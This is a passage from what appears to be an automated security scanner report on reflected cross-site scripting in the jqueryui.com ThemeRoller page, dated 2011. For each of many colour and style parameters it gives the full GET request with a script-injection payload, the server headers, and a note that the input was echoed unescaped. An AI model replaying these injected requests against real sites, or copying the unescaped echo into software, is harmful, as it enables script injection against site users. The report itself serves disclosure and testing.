&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 425e2"><script>alert(1)</script>1e60faee7e4 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2425e2"><script>alert(1)</script>1e60faee7e4&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9910"><script>alert(1)</script>45b756f1365 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbecd9910"><script>alert(1)</script>45b756f1365&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9875"><script>alert(1)</script>ed090a1eadc was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0aa9875"><script>alert(1)</script>ed090a1eadc&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:54 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0fc0"><script>alert(1)</script>1c9dbf1a53a was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7c0fc0"><script>alert(1)</script>1c9dbf1a53a&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b3c6"><script>alert(1)</script>fbf0392ad7e was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e5b3c6"><script>alert(1)</script>fbf0392ad7e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bc9"><script>alert(1)</script>0a3d7e23c38 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7e3bc9"><script>alert(1)</script>0a3d7e23c38&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b897e"><script>alert(1)</script>ffc301760e9 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5pxb897e"><script>alert(1)</script>ffc301760e9&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62820"><script>alert(1)</script>cb7327678f9 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px62820"><script>alert(1)</script>cb7327678f9 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:26:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bcb5"><script>alert(1)</script>11892851d8d was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e170099bcb5"><script>alert(1)</script>11892851d8d&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8019d"><script>alert(1)</script>93ec095a1b8 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=2222228019d"><script>alert(1)</script>93ec095a1b8&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59a64"><script>alert(1)</script>d6e8cc4be07 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e59a64"><script>alert(1)</script>d6e8cc4be07&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:36 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1cbd"><script>alert(1)</script>c9eff2d2687 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ac1cbd"><script>alert(1)</script>c9eff2d2687&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52361"><script>alert(1)</script>1f81954189a was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
